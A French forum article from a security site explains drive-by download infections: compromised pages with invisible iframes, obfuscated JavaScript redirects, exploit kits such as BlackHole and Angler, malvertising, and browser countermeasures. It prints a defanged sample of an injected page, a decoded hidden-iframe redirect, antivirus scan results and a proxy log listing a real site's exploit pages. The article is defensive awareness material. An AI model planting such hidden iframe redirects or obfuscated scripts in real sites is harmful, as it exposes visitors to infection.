Les Exploits sur les sites WEB piégés : Le Drive-By Download

Dans cette partie vous trouverez des papiers, articles sur l'informatique/sécurité.
Malekal_morte
Messages : 116212
Inscription : 10 sept. 2005 13:57

Les Exploits sur les sites WEB piégés : Le Drive-By Download

par Malekal_morte »

Les antivirus étant maintenant capables de protéger les internautes efficacement contre les vers par mails, les internautes étant de plus en plus avertis par cette méthode de propagation, les auteurs de malwares / virus utilisent de plus en plus les exploits sur les sites WEB pour infecter les internautes.


Vous pouvez aussi lire cet article plus récent :des attaques Drive-By Download.

Les exploits permettant l'installation d'une infection de manière automatique et à l'insu de l'utilisateur lors de la visite d'un site WEB.
L'exploit tire partie de vulnérabilités sur les logiciels installés sur l'ordinateur. Pour fonctionner donc, il faut que des logiciels non à jour et ayant des vulnérabilités soit présents sur l'ordinateur. En général, ce sont les plugins du navigateurs WEB qui sont visés notamment Java ou Adobe Reader/Flash.
Vous trouverez un exemple sur l'article Attention aux sites de cracks!
Nous allons voir le principe des infections via des exploits sur des sites WEB.

Pour bien comprendre ce qu'est une vulnérabilité, reportez-vous au dossier : Les vulnérabilités

!
La connaissance de certaines notions et expressions est nécessaire pour appréhender cet article... Reportez-vous au Glossaire : Notions et Expressions pour suivre cet article.
En vidéo, avec un plugin SilverLight non à jour :



Une vidéo plus ancienne avec un exploit Web tirant parti d'un plugin Java non à jour :


et cette vidéo pédagogique :




La théorie

Pour infecter votre ordinateur, l'auteur du malware doit réussir à exécuter sur votre ordinateur le fichier à l'origine de l'infection sans que les logiciels de protections ne le détectent/interceptent.
Une fois l'infection installée, votre antivirus peut détecter certains fichiers composant l'infection mais en règle générale, ce dernier n'arrive pas à détecter la totalité ou supprimer l'infection en entier surtout quand l'infection est composée de rootkits

La première difficulté pour installer une infection est donc de faire exécuter le fichier à l'origine de l'infection sur le système ciblé.
C'est à ce moment précis que les exploits vont être utilisés.
En visitant une page Web piégée, celle-ci va exploiter une faille de sécurité de votre navigateur WEB, système ou logiciels tiers afin de télécharger et exécuter à votre insu le fichier à l'origine de l'infection (illustration voir les pages IE6 VS IE 7 : Pourquoi maintenir son navigateur à jour ? et Dropper & Payload : Explications).
Pour fonctionner une faille doit être présente sur le système (Windows), ou logiciels installés sur votre ordinateur, c'est pour cela qu'il est important de maintenir son système ainsi que l'ensemble de ces logiciels à jour.

Les auteurs des malwares / virus pirate en permanence une multitude de sites WEB, si possible sur des thèmes suceptibles d'amener un maximum de personnes, donc par exemple des sites de cracks ou pornographiques. Ces sites WEB contiennent alors une iframe de 1 pixel de large pointant vers un ou plusieurs sites WEB contenant les exploits et le fichier à l'origine de l'infection.

L'iframe étant un cadre contenant une page html qui va être automatiquement exécutée par le navigateur, la taille de 1 pixel permet de cacher celle-ci de l'internaute au moment de consulter la page WEB.
L'iframe va alors rediriger l'internaute à son insu sur le site contenant l'exploit puis permettre le téléchargement et l'exécution du fichier à l'origine de l'infection au sein du système.

Voici un résumé via un schéma (cliquez sur l'image pour l'agrandir) :
Image

Lors de la visite de la page piégée, votre antivirus peut alors détecter l'exploit, généralement Exploit.ADODB.Stream.xxx ou JS/Psyme.xxx

Image

En pratique :

Voici un exemple de code d'une page WEB piégée. Toutes les adresses ont été masquées.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><base target="_blank">
<head>
<meta http-equiv="content-type" content="text/htxml;charset=iso-8859-1">
<title>xxxxxx xxxx</title>
<SxCRIPT language=JavaScript>
<!--
document.cookie = 'trafman=traf-0.805.1181008106.1.0.805.; path=/;;';
// -->
</SCRIPT>


</head>
<body bgcolor="#464646" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0" bottommargin="0">
<scrxipt type='text/javascript'>eval(String.fromCxharCode(100,111,99,117,120,101,110,116,46,120,114,105,116,101,40,39,60,105,12,114........,114,97,109,101,62,39,41)
</xscript>
<iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>
En rouge nous pouvons visualiser l'iframe qui permet une redirection vers l'adresse en src=
Les attributs width="1" height="1" donne une taille de 1 pixel sur 1 pixel à l'iframe.
Celle-ci est donc invisible pour l'utilisateur.

En bleu, nous avons un script offusqué. Ce dernier nous donne :

Code : Tout sélectionner

document.write('<iframe style="display:none" src="http://xx.xxx.xxx.xx/data/title.html" width=0 height=0></iframe>')
Encore une iframe de taille 0 qui renvoie vers un site.

Le fichier title.html de la première iframe en bleu contient :

Code : Tout sélectionner

<HTMx>
<HEAD>
</HEAD>
        <BODY>
                <iframx src="http://xx.xxx.xxx.xx/data/do_z.html" width="1" height="1"><iframe src="http://xx.xxx.xxx.xx/data/if_z.html" width="1" height="1"></iframe><iframe src="nie_z.html" width="1" height="1"></iframe>
</BODY>
</HTML>

enfin un scan des fichiers do_z.html & if_z.html nous donne :
Complete scanning result of "do_z.html", received in VirusTotal at 06.03.2007, 10:17:22 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.3
Authentium 4.93.8 05.23.2007 JS/Psyme.CA@dl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Psyme.CA@dl
F-Secure 6.70.13030.0 06.02.2007 JS/Psyme.CA@dl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.3

Aditional Information
File size: 3405 bytes
MD5: 18d6ee8bea0e60a073486af1aac08e06
SHA1: 0b66f4915e66a9adc0f275648283ed7a9789831b
Complete scanning result of "if_z.html", received in VirusTotal at 06.03.2007, 10:17:27 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.5.31.2 06.01.2007 no virus found
AntiVir 7.4.0.29 06.01.2007 JS/Psyme.SE.4
Authentium 4.93.8 05.23.2007 JS/Mht.BB@expl
Avast 4.7.997.0 06.01.2007 no virus found
AVG 7.5.0.467 06.02.2007 no virus found
BitDefender 7.2 06.03.2007 Exploit.ADODB.Stream.FD
CAT-QuickHeal 9.00 06.02.2007 no virus found
ClamAV devel-20070416 06.03.2007 no virus found
DrWeb 4.33 06.02.2007 no virus found
eSafe 7.0.15.0 05.31.2007 no virus found
eTrust-Vet 30.7.3688 06.03.2007 no virus found
Ewido 4.0 06.02.2007 no virus found
FileAdvisor 1 06.03.2007 no virus found
Fortinet 2.85.0.0 06.02.2007 no virus found
F-Prot 4.3.2.48 06.01.2007 JS/Mht.BB@expl
F-Secure 6.70.13030.0 06.02.2007 JS/Mht.BB@expl
Ikarus T3.1.1.8 06.03.2007 no virus found
Kaspersky 4.0.2.24 06.03.2007 no virus found
McAfee 5044 06.01.2007 no virus found
Microsoft 1.2503 06.03.2007 no virus found
NOD32v2 2305 06.01.2007 no virus found
Norman 5.80.02 06.01.2007 no virus found
Panda 9.0.0.4 06.02.2007 no virus found
Prevx1 V2 06.03.2007 no virus found
Sophos 4.18.0 06.01.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 06.03.2007 no virus found
TheHacker 6.1.6.128 05.31.2007 no virus found
VBA32 3.12.0 06.02.2007 no virus found
VirusBuster 4.3.23:9 06.02.2007 no virus found
Webwasher-Gateway 6.0.1 06.03.2007 Script.Psyme.SE.4

Aditional Information
File size: 2321 bytes
MD5: 9b5e23a1f45a9b3a1e9bfa32c4d4a51e
SHA1: a2e181ed072a0e0aae6cf832d1b8bd6c56859756
Ce sont donc deux exploits qui vont permettre le téléchargement et l'execution fichiers à l'origine de l'infection à l'insu de l'internaute.

Pour résumer : le site WEB piégé contient deux iframes invisibles à l'utilisateur. Au moment de consulter la page, le navigateur va se connecter au site WEB contenu dans les iframes et ceci de manière automatique.
La première iframe va lancer deux exploits sur le navigateur WEB qui vont exploiter une faille de sécurité sur le navigateur afin de permettre le téléchargement et l'execution des fichiers à l'origine de l'infection à l'insu de l'internaute.


Si l'on reprend cette page : http-www-golfinau-com-stat-flash-swf-t15582.html

On a les pages suivantes contenant des exploits :

Code : Tout sélectionner

1227990727.782     54 192.168.1.120 TCP_MISS/200 893 GET http://www.golfinau.com/stat/Flash.htm - DIRECT/85.17.212.137 text/html
1227990728.103     63 192.168.1.120 TCP_MISS/200 1934 GET http://www.golfinau.com/stat/
Ms06014.htm - DIRECT/85.17.212.137 text/html
1227990728.157    104 192.168.1.120 TCP_MISS/200 1743 GET http://www.golfinau.com/stat/Opera.htm - DIRECT/85.17.212.137 text/html
1227990728.161    106 192.168.1.120 TCP_MISS/200 1948 GET http://www.golfinau.com/stat/Ms08053.htm - DIRECT/85.17.212.137 text/html
1227990728.192     55 192.168.1.120 TCP_MISS/200 2986 GET http://www.golfinau.com/stat/Ms07055.htm - DIRECT/85.17.212.137 text/html
1227990728.787     55 192.168.1.120 TCP_MISS/200 2694 GET http://www.golfinau.com/stat/Djvu.htm - DIRECT/85.17.212.137 text/html
Les tentatives d’exécution du code malicieux se font à partir des vulnérabilités suivantes :
Ce qu'il faut comprendre, c'est que pour avoir plus de chance d'infecter votre ordinateur, c'est une série d'exploits visant Windows ou des logiciels tiers qui sont testés. Dans l'exemple ci-dessus, il n'y a que 6 exploits mais on peux arriver facilement à une vingtaine visant des logiciels différents : Quicktime, Winzip, RealPlayer et bien souvent Flash, Java et Adobe Reader via des PDF malicieux.
Le but étant pour les auteurs de malwares / virus d'augmenter les chances d'infection en tentant d'attaquer un maximum de logiciels différents puisque les chances qu'un logiciel non à jour sur le système visé soit présent sont fortes.


Voici une page qui donne plus d'informations sur l'utilisation de Javascript pour rediriger les internautes vers des ExploitKits : https://www.malekal.com/piratagehack-site-web-et-javascript-malicieux/

Image

Ces Javascript peuvent être détectés de plusieurs manières par les antivirus, comme Trojan.JS, Trojan.Downloader.JS ou encore JS/Redir.

Image

Vous trouverez une autre description encore plus détaillée sur le comparatif des antivirus gratuits 2010 dans la partie du Test de blockage des URL malicieuses : comparatif-antivirus-gratuits-2010-t23535.html#p196483

Il faut donc bien comprendre qu'il est important de maintenir son système et ses logiciels à jour, la simple présence d'un logiciel non à jour suffit pour infecter votre ordinateur. Je repète, c'est la simple présence du logiciel non à jour qui met votre système en danger, logiciel utilisé ou non genre rien, d'ailleurs dans le cas d'un logiciel non utilisé, il vaut mieux le désinstalle, vous gagnez en sécurité car vous risquez d'oublier de le mettre à jour.
Pour maintenir son système à jour, faites un Scan de vulnérabilités


Vulnérabilités 0-Day

Une vulnérabilité 0-day est une vulnérabilité publiée non corrigée, aucune correctif n'est disponible.
Si celle-ci est incorporée dans un web exploitkit, les ordinateurs des internautes peuvent donc être en danger.
Le délai de mise en ligne d'un correctif peut aller d'une journée à plusieurs jours selon l'éditeur.
Vous l'aurez compris, le but est d'intégré le plus vite possible ces vulnérabilités avant que l'éditeur met en ligne un correctif et que les internautes l'installent afin d'infecter le maximum d'ordinateur.

Cela montre aussi encore une fois, l'importance de maintenir ses programmes à jour.
La FAQ suivante peut vous y aider : Logiciels pour maintenir ses programmes à jour

Quelques exemples de 0-Day :

Cela est arrivé plusieurs fois avec Java et Flash par exemple avec la vulnérabilité Exploit.Java.CVE-2012-4681.

En Juillet 2015, deux 0-day ont été publiées à la suite sur Flash et Java : http://forum.malekal.com/day-flash-java ... ml#p401199


Des contre-mesures sont possibles comme NoScript qui permet de filtrer l'utilisation de plugins tiers selon une liste blanche.

Noscript en vidéo :


Côté vulnérabilités, Java, Flash, SilverLight sont les plugins les plus touchés :
Vulnerabilites_Exploit_produits.png
Vulnerabilites_Exploit_produits_2.png
flashvulnerabilite.jpg
Les vulnérabilités Adobe Flash par année (source https://labsblog.f-secure.com/2016/05/2 ... data-pr0n/ ).
Image

Distribution : Malvertising (publicités malicieuses)

Vous pouvez vous reporter au dossier : Publicités malicieuses : « Malvertising »

De nombreux sites se font hacker afin que lorsque l'internaute visite ce site, les exploits se lancent et si elles y parviennent infecte son ordinateur.
Seulement, hacker des sites à forte audience n'est pas forcément facile et surtout cela peux être corrigé rapidement, le nombre d'internaute infecte peux augmenter sensiblement mais sera très court.

Une autre approche consiste à utiliser des bannières malicieuse et à les vendre à des regies de pubs.
Ces bannières lorsqu'elles seront affichés vont conduire aux exploits.
Le gros avantage est qu'en plus, on peux viser des thématiques particulièrement de sites.
C'est notamment ce qui arrive depuis fin 2011 où des sites de streaming et de téléchargements illégaux ont été visés par des malvertising afin de faire installer des ransomwares Fake Police.
Ceci a permis d'infecter un nombre assez conséquent d'internautes puisque ces sites ont une forte audience sur une longue durée (plusieurs semaines).

Une des malvertising touchée le site videobb via la régie adserve, videobb un site qui permettait de visualiser des films de streaming comme megaupload. Ceci a permis de toucher beaucoup d'internautes.

Des malvertising ont aussi été distribuées à la régie de publicité clicksor qui est très répandue et notamment présente sur Piratebay : https://www.malekal.com/?s=clicksor

Par la suite, des sites pornographiques ont été visés : Une résumé sur le billet suivant : Revue de Presse : rapport Symantec et les malvertising ?

Pour d'autres exemples, suivre le tag Malvertising : https://www.malekal.com/tag/malvertising/

Voici une vidéo où on voit une malvertising qui lors de son affichage lance une infection de type Zbot :


ou sur Piratebay :




Contre-mesures sur les navigateurs WEB

Devant l'émergence de ses menaces, depuis 2008, les navigateurs WEB ajoutent des contre-mesures afin de protéger les internautes.

Firefox vous notifie lorsque des plugins ne sont pas à jour :

Image

Image

Certaines extensions peuvent être automatiquement désactivées.

Image

La page suivante permet de tester ses plugins et vérifier s'ils posent des problèmes de sécurité : https://www.mozilla.org/fr/plugincheck/

Image

Google Chrome vous notifie lorsqu'une applet Java souhaite se lancer, vous devez donc vous-même lancer son exécution.
Cela permet d’empêcher l’exécution automatique de plugins depuis les navigateurs WEB.
Image

Depuis Windows Vista, une nouvelle fonctionnalité pour les navigateurs permet de les faire tourner dans une sandbox - "bac à sable".
Le but est de faire tourner le navigateur WEB dans un environnement fermé qui est dissocié du système. Dès lors, si un malware se lance, il ne pourra pas atteindre le système et l'infecter.

Si vous utilisez Internet Explorer, il convient de désactiver les javascript dans Adobe Reader et de désactiver Java.
(Les pages plus bas pour sécuriser vos navigateurs WEB vous expliquent comment faire).

Business autour des Web Malware Exploitation Kit

Des Web Malware exploitation Kit sont en vente avec différents noms MPack, El-Fiesta etc.. , le Web Malware exploitation Kit est donc un pack qui propose différents exploits et interface WEB de gestion du kit, statistiques etc.

Présentation du BlackHole Exploit WebKit :

Image

Voici un exemple de la page de statistiques du Web Malware Exploitation Kit El-Fiesta.
On y e trouve les statistiques d'infection par pays, navigateur WEB, version de Windows etc.
BlackHole a été stoppé après l'arrestation de son autour fin 2013 et remplacer par un autre ExploitKit tout aussi sophistiqué : Angler EK.

Les statistiques sont plus ou moins détaillées selon le Web Malware Exploitation Kit El-Fiesta

Image

ou encore Rig Exploit Kit :

Image

Image

Un groupe peut alors acheter ce Web Malware Exploitation Kit, acheter différents trojans et ne s'occuper que la diffusion de leurs infections afin de se constituer un réseau de botnet et le louer pour des campagnes de SPAM etc.

Vous l'aurez compris, il existe tout un éco-système autour des malwares / virus, la concurrence entre les différents kits font que ces derniers doivent être performants (afin de vendre +), dès lors ils intègrent très rapidement les dernières vulnérabilités découvertes sur vos logiciels.

Les Web Exploit Kit du les plus virulents ; 2015/2016 :

2015 a vu une chute des Web Exploits, les navigateurs WEB ayant pris de plus en plus de mesures de sécurité et des arrestations ont fortement perturbé ce vecteur d'infection.
Le WebExploit Kit Angler, un des plus virulent et perfectionné, avait été stoppé mais Neutrino EK avait pris la relève.

Image

Une étude de Microsoft sur les Web Exploit en 2016 : Exploit kits remain a cybercrime staple against outdated software – 2016 threat landscape review series.


Neutrino EK reste le plus actif
Exploit-kits-volume-by-family-2016-2.png
Les pays les plus touchés, la France se place 5e :
webexploit_volume_pays.png
En Conclusion :

Les auteurs de malwares / virus piratent des sites WEB afin de diffuser leurs infections.
Un simple programme permet aux auteurs de malwares / virus de mettre à jour leurs centaines de sites pour faire pointer vers de nouveaux exploits qui vont exploiter les dernières failles de sécurité de vos logiciels ou tout simplement lorsque le fichier à l'origine de l'infection est trop bien détecté par les antivirus.

Pour ne pas vous faire infecter par ces exploits, maintenez votre système à jour, bannissez les versions obselètes des navigateurs WEB et utilisez un navigateur alternatif que vous sécurisez, (voir Sécuriser son ordinateur version courte).
Pensez aussi à maintenir à jour vos logiciels tiers et notamment les plugins de votre navigateur WEB, je vous conseille vivement de lire la page : Infections : exploitation SWF/PDF et Java qui montre que les plugins des navigateurs WEB sont des portes d'entrée.

En ce qui concerne les malvertising, en plus de maintenir ses logiciels à jour, il est possible de filtrer les publicités notamment via l'extension adblock pour Firefox ( voir la page Sécuriser Firefox.

Pour aller plus loin :
Pourquoi et comment je me fais infecter?

Sécuriser ses navigateurs : Plus globalement, vous pouvez lire la page Sécuriser son ordinateur et connaître les menaces qui vous liste les moyens de propagation et menaces sur internet et vous donne des conseils pour sécuriser votre ordinateur.

Les liens :
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116212
Inscription : 10 sept. 2005 13:57

Re: Les Exploits sur les sites WEB piégés

par Malekal_morte »

03/12/2008 : Page revistée dans sa seconde partie.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116212
Inscription : 10 sept. 2005 13:57

Re: Les Exploits sur les sites WEB piégés

par Malekal_morte »

Eventuellement voir la news : Insight a ZeuS C&C server
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116212
Inscription : 10 sept. 2005 13:57

Re: Les Exploits sur les sites WEB piégés : Le Drive-By Download

par Malekal_morte »

Article sur le site en lien : les attaques Drive-By Download.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Papiers / Articles »